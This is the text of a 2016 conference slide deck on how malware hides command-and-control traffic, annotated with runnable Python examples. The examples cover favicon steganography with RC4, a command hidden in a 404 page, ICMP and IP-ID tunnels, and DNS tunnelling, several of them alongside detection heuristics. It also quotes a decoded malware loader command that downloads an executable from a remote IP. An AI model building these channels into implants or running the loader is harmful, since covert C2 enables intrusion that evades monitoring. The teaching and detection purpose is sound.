Malware Command and Control: Evasion Tactics and Techniques
Malware is designed to perform malicious actions without catching the attention of the user, and malware authors keep developing new ideas to stay undetected by security technologies. To remain undetected, the communication channel between attacker and malware needs to be stealthy and evolving. Establishing command and control, so that the implant can receive commands from the attacker on demand, is an essential phase of the Cyber Kill Chain.
As a result, we are observing continuous advancement in the communication channels used for malware command and control.
In this session we cover some of the advanced techniques malware uses today to communicate with its command and control.
Null 11 june_Malware CNC: Advance Evasion techniques_by Avkash k and dhawal shah
1. MALWARE COMMAND AND CONTROL:
EVASION TACTICS AND TECHNIQUES
Avkash Kathiriya
Information Security Learner
Dhawal Shah
Information Security Learner
2. AGENDA
• CKC (Cyber Kill Chain) Revision
• What is Command and control?
• What is Malware CnC?
• Why CnC?
• Channels of CnC
• Some advanced CnC
6/11/2016 MALWARE CNC BY AVKASH K & DHAWAL SHAH 2
3. ./Shell> Cyber Kill Chain revision
4. Our focus in this session will be Command and Control
5. What is Command and Control?
6. C: Command and Control > CnC.txt
Command & Control
7. C: Command and Control > CnC.txt
Command & Control: the idea is to give commands to control your systems and accomplish your aim.
8. What is Malware CnC?
Diagram: the attacker issues commands to the command and control server, which passes them to the compromised system; responses travel back along the same path.
12. Evolution of CnC Techniques
Timeline: early malware was mostly IRC based, followed by a rapid evolution of CnC techniques: P2P, DNS, HTTP, domain flux, tunnelling.
14. The answer is to stay undetected = need for covert communication
15. Covert communication?
• The capability to transfer information between two hosts which are not explicitly allowed to communicate.
• A mechanism for sending and receiving information between machines without alerting any firewalls or IDSs on the network.
• You want to communicate with someone without being observed.
• Cryptography/encryption is not good enough:
– You want to hide the fact that you are communicating at all.
– The best way is to hide the communication in innocuous-looking network traffic or data.
– The firewall must let the traffic pass through.
16. Covert communication?
Diagram: normal DNS requests and replies leave the internal network, and malicious DNS requests and replies carrying the CnC traffic leave alongside them.
It is a method of performing malicious communication over legitimate, basic channels which you cannot block at the perimeter, e.g. DNS in this case.
24. Web CnC?
• Direct connection to the Internet on port 80
• This will be blocked in most cases
• Identify the proxy being used and divert the web CnC through the proxy
• The proxy needs authentication, which the malware can obtain anyway
• Reverse WWW shell
• Looks like an ordinary HTTP request to a server as far as the firewall is concerned
• The server sends back HTML resources that are interpreted as shell commands
• E.g. GoToMyPC
25. Advanced Web CnC?
• Using HTTP GET and POST for communication
• HTTP tunneling
• Downloading information hidden in favicon.ico:
– Extract the data using LSB steganography
– Decrypt the data using RC4
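The favicon.ico technique above, as an added example (my code, not the slides' and not any real malware's): a payload is hidden one bit per sample in the least-significant bits of an image buffer, and the payload itself is RC4-encrypted. Everything about the framing is an assumption of mine: the image is treated as a flat buffer of 8-bit samples (raw RGB, no file-format parsing), the payload is prefixed with a 2-byte big-endian length, bits are written MSB first, and the RC4 key is a fixed string. A real sample will differ in every one of these details; what carries over is the two-stage structure (stego extract, then decrypt) and the fact that each pixel changes by at most one, so the image still looks normal.

```python
"""Added example: recover an RC4-encrypted command from image LSBs.

Assumptions (not from the slides): flat 8-bit sample buffer, 2-byte length
prefix, one payload bit per sample (MSB first), fixed RC4 key.
"""
import os


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 key scheduling + PRGA. Symmetric: the same call encrypts and decrypts.
    RC4 is broken as a cipher; malware keeps using it because it is tiny."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def lsb_embed(samples: bytes, payload: bytes) -> bytes:
    """Write a 2-byte length then the payload into the LSB of successive samples."""
    framed = len(payload).to_bytes(2, "big") + payload
    if len(framed) * 8 > len(samples):
        raise ValueError("cover too small for payload")
    out = bytearray(samples)
    for bit_index in range(len(framed) * 8):
        bit = (framed[bit_index >> 3] >> (7 - (bit_index & 7))) & 1
        out[bit_index] = (out[bit_index] & 0xFE) | bit   # each sample moves by at most 1
    return bytes(out)


def lsb_extract(samples: bytes) -> bytes:
    """Read the 2-byte length, then that many bytes, from sample LSBs."""
    def read_bytes(start_bit: int, count: int) -> bytes:
        value = bytearray()
        for b in range(count):
            byte = 0
            for k in range(8):
                byte = (byte << 1) | (samples[start_bit + b * 8 + k] & 1)
            value.append(byte)
        return bytes(value)

    length = int.from_bytes(read_bytes(0, 2), "big")
    return read_bytes(16, length)


def hide_command(cover: bytes, key: bytes, command: bytes) -> bytes:
    """Attacker side: encrypt, then embed into the cover image."""
    return lsb_embed(cover, rc4(key, command))


def recover_command(stego: bytes, key: bytes) -> bytes:
    """Implant side: extract from the downloaded image, then decrypt."""
    return rc4(key, lsb_extract(stego))


# Constructed sample: random bytes stand in for a 16x16 RGB favicon's pixel data.
COVER = os.urandom(16 * 16 * 3)
KEY = b"example-rc4-key"          # assumed key, not from any real sample
COMMAND = b"loader http://127.0.0.1/stage2.exe#rate 60#"   # constructed command string

if __name__ == "__main__":
    stego = hide_command(COVER, KEY, COMMAND)
    print(recover_command(stego, KEY))
```

Note that the stego image is the same size as the cover and no sample differs from the original by more than one, which is why a favicon carrying a command is indistinguishable from a clean one by eye; detection has to come from the download pattern (periodic fetches of a static icon) rather than from the image itself.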
29. Advanced Web CnC?
• YouTube as a malware CnC
Diagram: attacker and endpoint exchange messages through YouTube.
30. Advanced Web CnC?
• HTTP error messages
HTTP/1.1 404 Not Found
Date: Mon, 9 Jul 2015 06:13:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.3.29
Vary: Accept-Encoding,User-Agent
Content-Length: 357
Connection: close
Content-Type: text/html; charset=utf8
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /XXX/YYY.php was not found on this server.<P><HR><ADDRESS></ADDRESS></BODY></HTML><!-- DEBUG: MTQyODUyMTUyMzcyOTk5MyNsb2FkZXIgaHR0cDovLzExMS4xNzkuMzkuODMvZ29sZGVuMy5leGUjMTQyODUxMjA2MTc1NDYzNSNyYXRlIDYwIw DEBUG-->
=============================================================================
Decoded value:
1428521523729993#loader http://111.179.39.83/golden3.exe#1428512061754635#rate 60#
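The 404 page above, parsed by added example code (mine, not the slides' and not the malware's own parser). The response text is reproduced from the slide with the comment joined onto one line; the field semantics are my reading of the decoded value, namely `#`-separated fields alternating an opaque numeric id and a `verb argument` command. Two practical points the slide does not spell out: the base64 on the page has no `=` padding, so a decoder must add it, and a defender can flag this pattern generically as an error page whose HTML comment contains a long base64-looking run.

```python
"""Added example: pull the command out of a 404 page's HTML comment.

Assumptions (mine): comment delimited by "DEBUG:" ... "DEBUG", base64 that
may lack padding, fields alternating id / "verb argument".
"""
import base64
import re
from typing import List, Tuple

# Response reproduced from the slide; the comment is joined onto one line.
SAMPLE_404 = (
    "HTTP/1.1 404 Not Found\r\n"
    "Date: Mon, 9 Jul 2015 06:13:37 GMT\r\n"
    "Server: Apache/2\r\n"
    "X-Powered-By: PHP/5.3.29\r\n"
    "Vary: Accept-Encoding,User-Agent\r\n"
    "Content-Length: 357\r\n"
    "Connection: close\r\n"
    "Content-Type: text/html; charset=utf8\r\n"
    "\r\n"
    '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not '
    "Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /XXX/YYY.php was not "
    "found on this server.<P><HR><ADDRESS></ADDRESS></BODY></HTML><!-- DEBUG: "
    "MTQyODUyMTUyMzcyOTk5MyNsb2FkZXIgaHR0cDovLzExMS4xNzkuMzkuODMvZ29sZGVuMy5leGUj"
    "MTQyODUxMjA2MTc1NDYzNSNyYXRlIDYwIw"
    "DEBUG-->"
)

# The base64 alphabet contains D,E,B,U,G, so the greedy group backtracks until
# the literal "DEBUG-->" terminator matches.
COMMENT_RE = re.compile(r"<!--\s*DEBUG:\s*([A-Za-z0-9+/=]+)\s*DEBUG\s*-->")
# Generic detector: any HTML comment holding a base64-looking run of 32+ chars.
B64_RUN_RE = re.compile(r"<!--[^>]*?[A-Za-z0-9+/]{32,}={0,2}[^>]*?-->", re.S)


def split_message(raw: str) -> Tuple[str, str]:
    """Return (status line, body) of a raw HTTP response."""
    head, _, body = raw.partition("\r\n\r\n")
    return head.split("\r\n", 1)[0], body


def extract_commands(raw: str) -> List[Tuple[str, str, str]]:
    """Return [(id, verb, argument), ...] hidden in the response, or [] if none."""
    _status, body = split_message(raw)
    m = COMMENT_RE.search(body)
    if not m:
        return []
    b64 = m.group(1)
    b64 += "=" * (-len(b64) % 4)          # the sample omits padding; b64decode insists on it
    decoded = base64.b64decode(b64).decode("utf-8", errors="replace")
    fields = [f for f in decoded.split("#") if f]
    commands = []
    for ident, cmd in zip(fields[0::2], fields[1::2]):
        verb, _, arg = cmd.partition(" ")
        commands.append((ident, verb, arg))
    return commands


def suspicious_error_page(raw: str) -> bool:
    """Detection heuristic: 4xx/5xx status plus a base64 blob inside an HTML comment."""
    status, body = split_message(raw)
    parts = status.split(" ")
    code = parts[1] if len(parts) > 1 else ""
    return code.startswith(("4", "5")) and B64_RUN_RE.search(body) is not None


if __name__ == "__main__":
    for ident, verb, arg in extract_commands(SAMPLE_404):
        print(ident, verb, arg)
    print("suspicious:", suspicious_error_page(SAMPLE_404))
```

The `loader` verb with a URL and the `rate 60` verb are exactly why a 404 is a good cover: a proxy log shows a failed request to an unremarkable PHP path, and nothing in the status line or headers is unusual. The detection angle is the body, not the headers.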
31. Hiding commands in HTTP messages
33. Email CnC?
• It's pretty simple: just use the SMTP channel for sending and receiving commands from your controller.
Diagram: the attacker sends commands to the endpoint through email (SMTP) and receives the responses back through SMTP.
An evasion technique seen in this type of communication is the use of PowerShell.
35. Network CnC?
Types of covert channel communication at the network layer
• Storage channels
– Hide data within unused TCP/IP packet header fields
• TCP flags field, TCP ISN, etc.
• Timing channels
– Modulate system resources in such a way that a receiver can observe and decode it
– Port knocking, varying packet rates, etc.
36. Network CnC?
• Protocol tunneling:
– A protocol that carries data from another protocol.
– Example: SSH
– SSH allows you to set up a secure connection between two computers.
– This connection can then carry insecure protocols such as FTP.
• Tunnel through any TCP/IP traffic
– Insert data in unused or misused fields in the protocol headers of packets, such as:
– IP Identification
– TCP sequence number
– TCP acknowledgment number
37. Network CnC?
• Hiding information in existing protocols such as HTTP, DNS, and ICMP
• Pros/cons of each protocol
– HTTP is good for large data transfers, but more conspicuous
– DNS is not great for data transfer, but good for C&C
– ICMP is good for C&C but is often blocked
• The author of The Rootkit Arsenal proposes writing your own TCP/IP stack using MS Windows NDIS
• BitTorrent tracker protocol tunneling
38. Network CnC?
Example: LOKI
The attacker installs the Loki server (a.k.a. lokid) on the victim.
The attacker runs the Loki client on his own machine.
Loki tunnels the attacker's commands:
The attacker writes shell commands.
The Loki client sends out several ICMP packets to the victim, each containing part of the command.
The Loki server receives the ICMP packets and extracts the attacker's command.
The Loki server executes it.
In the reverse direction, the Loki server wraps responses in ICMP messages and sends them to the Loki client, which displays them.
Port scanners and netstat cannot detect Loki, since ICMP does not use ports.
The only traces are the Loki server running as root and the ICMP messages going back and forth.
39. Network CnC?
• ICMP covert tunnels
• Mechanism
• Use of ping request/response
• Tool: ptunnel (http://www.cs.uit.no/~daniels/PingTunnel/PingTunnel-0.71.tar.gz)
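The Loki/ptunnel mechanism above and the header-field storage channel from slides 35 and 36, as one added example (my code; not Loki's, not ptunnel's, not from the slides). It builds and parses raw IPv4 and ICMP bytes with only the standard library, so the checksum arithmetic and field layout are real, but nothing is put on the wire: doing that needs a raw socket and CAP_NET_RAW. Everything about the framing is my assumption: the marker `0x4C4B` in the ICMP identifier field that tells the server which echo requests belong to the tunnel, 8-byte command fragments, and the high bit of the sequence field as an end-of-command flag.

```python
"""Added example: two covert channels over raw IPv4/ICMP bytes.

  1. Loki/ptunnel style: a command split across echo-request payloads,
     reordered by the ICMP sequence field.
  2. Storage channel: two bytes per packet in the IPv4 Identification field
     of packets that otherwise look like ordinary pings.

Assumptions (mine): MAGIC_ID, FRAG, and the end-of-command flag bit.
"""
import struct
from typing import Dict, List, Tuple

MAGIC_ID = 0x4C4B  # assumed tunnel marker; ordinary pings carry the process id here
FRAG = 8           # command bytes per echo request (assumed, small as in Loki)


def inet_checksum(data: bytes) -> int:
    """RFC 1071 ones'-complement checksum; returns 0 over a correctly summed header."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def ipv4(src: str, dst: str, proto: int, payload: bytes, ident: int = 0) -> bytes:
    """Minimal 20-byte IPv4 header (TTL 64, no options) with checksum, plus payload."""
    addr = lambda s: bytes(int(x) for x in s.split("."))
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), ident, 0, 64,
                      proto, 0, addr(src), addr(dst))
    return hdr[:10] + struct.pack("!H", inet_checksum(hdr)) + hdr[12:] + payload


def parse_ipv4(pkt: bytes) -> Tuple[Dict[str, int], bytes]:
    f = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    ihl = (f[0] & 0x0F) * 4
    if inet_checksum(pkt[:ihl]) != 0:
        raise ValueError("bad IPv4 checksum")
    return {"id": f[3], "proto": f[6]}, pkt[ihl:f[2]]


def icmp_echo(ident: int, seq: int, payload: bytes) -> bytes:
    """ICMP type 8 (echo request) with checksum over header + payload."""
    csum = inet_checksum(struct.pack("!BBHHH", 8, 0, 0, ident, seq) + payload)
    return struct.pack("!BBHHH", 8, 0, csum, ident, seq) + payload


def parse_icmp(data: bytes) -> Tuple[int, int, int, bytes]:
    if inet_checksum(data) != 0:
        raise ValueError("bad ICMP checksum")
    typ, _code, _csum, ident, seq = struct.unpack("!BBHHH", data[:8])
    return typ, ident, seq, data[8:]


# 1. Loki style: command fragments ride in echo-request payloads.
def icmp_tunnel_send(command: bytes, src: str = "10.0.0.5", dst: str = "10.0.0.9") -> List[bytes]:
    chunks = [command[i:i + FRAG] for i in range(0, len(command), FRAG)] or [b""]
    last = len(chunks) - 1
    return [ipv4(src, dst, 1, icmp_echo(MAGIC_ID, seq | (0x8000 if seq == last else 0), chunk))
            for seq, chunk in enumerate(chunks)]


def icmp_tunnel_receive(pkts: List[bytes]) -> bytes:
    """Server side: keep only echo requests carrying MAGIC_ID, reorder by sequence."""
    frags: Dict[int, bytes] = {}
    for pkt in pkts:
        hdr, body = parse_ipv4(pkt)
        if hdr["proto"] != 1:
            continue
        typ, ident, seq, payload = parse_icmp(body)
        if typ == 8 and ident == MAGIC_ID:
            frags[seq & 0x7FFF] = payload
    return b"".join(frags[k] for k in sorted(frags))


# 2. Storage channel: the secret is in the IP Identification field; the payload is a plain ping.
def ipid_send(data: bytes, src: str = "10.0.0.5", dst: str = "10.0.0.9") -> List[bytes]:
    data += b"\x00" * (len(data) % 2)      # pad to whole 16-bit words
    return [ipv4(src, dst, 1, icmp_echo(1, n, b"ping"),
                 ident=struct.unpack("!H", data[i:i + 2])[0])
            for n, i in enumerate(range(0, len(data), 2))]


def ipid_receive(pkts: List[bytes]) -> bytes:
    # rstrip drops the pad byte; a real protocol would carry an explicit length
    return b"".join(struct.pack("!H", parse_ipv4(p)[0]["id"]) for p in pkts).rstrip(b"\x00")


if __name__ == "__main__":
    print(icmp_tunnel_receive(icmp_tunnel_send(b"uname -a; id")))
    print(ipid_receive(ipid_send(b"secret!")))
```

The two channels fail differently under inspection. The Loki-style tunnel is visible to anyone who looks at echo payloads, since a normal ping carries a timestamp and a fixed pattern rather than shell text, and the constant identifier across many requests is itself a signature. The IP ID channel survives payload inspection entirely, but a NAT or a stack that rewrites the Identification field, or a host that emits IDs in a known sequence, breaks it or makes it stand out.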
40. ICMP Covert Tunnels
• Mechanism of ptunnel tool
41. ICMP Covert Tunnels
• Wireshark capture of ptunnel tool
42. DNS Covert Tunnels
Mechanism of DNS Covert Channel - Feederbot
Normal:
;QUESTION
newcommunitybank.com. IN A
;ANSWER
newcommunitybank.com. 86400 IN A 74.54.82.153
===========================================================================
Malicious:
;QUESTION
f16e180e9093c237ea31a4ab55ae7fac710a14e4972b30fdf4.google.com. IN ANY
;ANSWER
f16e180e9093c237ea31a4ab55ae7fac710a14e4972b30fdf4.google.com. 0 IN TXT
"aYpYOb/6L5NRMxDRbwQDrVfPJDw5yogih+zlfj+lQpRDPZE4n1DWB0M/l0J6YDp88Vgm"
43. DNS Covert Tunnels
Mechanism of DNS Covert Channel - Feederbot
• 50-char system-dependent bot ID:
f16e180e9093c237ea31a4ab55ae7fac710a14e4972b30fdf4
• RC4-encrypted bootstrap traffic
0000 8E 68 00 00 0B 00 00 00 17 00 00 00 39 34 2E 32 .h..........94.2
0010 33 2E 36 2E 36 37 00 69 6D 61 67 65 73 2E 6D 6F 3.6.67.images.mo
0020 76 69 65 64 79 65 61 72 2E 6E 65 74 2E 00 3C viedyear.net..<
• Contains a referral to the next C2 server node 94.23.6.67
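The Feederbot exchange on slides 42 and 43, as an added example (my code; not Feederbot's and not from the slides). It shows both sides of the channel, a bot-side encoder that carries data in query names under a parent domain and reads commands back from a TXT answer, and a resolver-log check that scores query names for the traits visible in the malicious query above. The bot id is the 50-character value from the slide; the rest is my assumption: hex-encoded data labels after a 2-hex-digit sequence label, base64 in the TXT reply, a two-label registrable zone when splitting the name (a real detector would use the public suffix list), and the scoring thresholds. The example goes a little beyond the slide by scoring several kinds of query, not just the one shown.

```python
"""Added example: DNS covert channel encoder and a resolver-log detector.

Assumptions (mine): label layout <bot-id>.<seq>.<hex>[.<hex>].<parent>,
base64 TXT replies, two-label zone when scoring, thresholds below.
"""
import base64
import math
import re
from typing import List, Tuple

BOT_ID = "f16e180e9093c237ea31a4ab55ae7fac710a14e4972b30fdf4"  # from the slide
LABEL_MAX = 63       # RFC 1035 label limit
DATA_LABELS = 2      # data labels per query name (assumed)


def encode_queries(data: bytes, parent: str) -> List[str]:
    """Bot side: one query name per chunk, <bot-id>.<seq>.<hex labels>.<parent>."""
    hexed, step = data.hex(), LABEL_MAX * DATA_LABELS
    names = []
    for seq, i in enumerate(range(0, len(hexed), step)):
        piece = hexed[i:i + step]
        labels = [piece[j:j + LABEL_MAX] for j in range(0, len(piece), LABEL_MAX)]
        name = ".".join([BOT_ID, "%02x" % seq] + labels + [parent])
        assert len(name) <= 253, "name exceeds the RFC 1035 limit"
        names.append(name)
    return names


def decode_query(name: str, parent: str) -> Tuple[str, int, bytes]:
    """C2 side: recover (bot id, sequence, chunk) from a query name."""
    if not name.endswith("." + parent):
        raise ValueError("query is not under our zone")
    labels = name[: -len(parent) - 1].split(".")
    return labels[0], int(labels[1], 16), bytes.fromhex("".join(labels[2:]))


def reassemble(names: List[str], parent: str) -> bytes:
    chunks = {seq: chunk for _, seq, chunk in (decode_query(n, parent) for n in names)}
    return b"".join(chunks[k] for k in sorted(chunks))


def txt_command(command: bytes) -> str:
    """The C2 answers with a TXT record; TTL 0 (as on the slide) keeps it out of caches."""
    return base64.b64encode(command).decode()


def entropy(s: str) -> float:
    """Shannon entropy in bits per character (4.0 is the maximum for pure hex)."""
    return -sum((s.count(c) / len(s)) * math.log2(s.count(c) / len(s)) for c in set(s)) if s else 0.0


def tunnel_score(qname: str, qtype: str, ttl: int = -1) -> int:
    """One point per heuristic; 3 or more is worth an analyst's look."""
    labels = qname.rstrip(".").split(".")
    sub = ".".join(labels[:-2])          # below the registrable domain (2-label zone assumed)
    checks = [
        len(sub) > 40,                                   # a lot of data below the zone
        any(len(l) > 30 for l in labels),                # unusually long label
        entropy(sub) > 3.5,                              # encoded, not words
        bool(re.fullmatch(r"[0-9a-f.]{20,}", sub)),      # long pure-hex subdomain
        qtype in ("TXT", "NULL", "ANY"),                 # data-bearing record types
        ttl == 0,                                        # uncacheable answer
    ]
    return sum(checks)


LOG_RE = re.compile(r"qname=(\S+) qtype=(\S+)(?: ttl=(\d+))?")

# Constructed resolver log lines; the two query names are the ones on slide 42.
SAMPLE_LOG = """\
2016-06-11T10:00:01 client=10.0.0.5 qname=newcommunitybank.com qtype=A ttl=86400
2016-06-11T10:00:02 client=10.0.0.5 qname=www.newcommunitybank.com qtype=A ttl=300
2016-06-11T10:00:03 client=10.0.0.7 qname=f16e180e9093c237ea31a4ab55ae7fac710a14e4972b30fdf4.google.com qtype=ANY ttl=0
"""


def flag_log(log: str, threshold: int = 3) -> List[Tuple[str, int]]:
    """Return (qname, score) for every log line at or above the threshold."""
    hits = []
    for line in log.splitlines():
        m = LOG_RE.search(line)
        if not m:
            continue
        ttl = int(m.group(3)) if m.group(3) else -1
        score = tunnel_score(m.group(1), m.group(2), ttl)
        if score >= threshold:
            hits.append((m.group(1), score))
    return hits


if __name__ == "__main__":
    print(flag_log(SAMPLE_LOG))
```

Note that the malicious query is under `google.com`, a domain the bot does not control; what matters to the bot is only that the resolver forwards the name somewhere the attacker can observe it, or that the reply is served by a resolver the attacker has poisoned, so blocking by reputation of the parent domain does not help. The score works on the shape of the name and the record type instead.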
44. DNS Covert Tunnels
• Tool: OzymanDNS
45. DNS Covert Tunnels
• WireShark Capture of OzymanDNS
46. DNS Covert Tunnels
• Packet Capture of OzymanDNS
49. Endpoint CnC?
Endpoint USB
Not actual CnC, but in this case the method of infection and communication was USB.
50. Conclusion
• CnC is key for any malware to sustain its footprint
• The techniques and tactics used to evade detection of the CnC channel have evolved over time
• The idea is to hide in the mass and exploit the flaws in traditional communication channels
• Attackers stay connected with their target and keep nurturing the malware they have planted
51. References
• Lockheed Martin: Cyber Kill Chain
• SANS Institute: Covert Channels
• Erland Jonsson: Introduction to Malicious Code
• Black Hat EU 2015: Hiding in Plain Sight
52. Contact
• Twitter : @avkashk
• Blog: www.avkashk.wordpress.com or LinkedIn Pulse (Avkash Kathiriya)
• Email : avkashk@null.co.in
• Twitter:@shahdhawal
• Email: shah.dhawal.s@gmail.com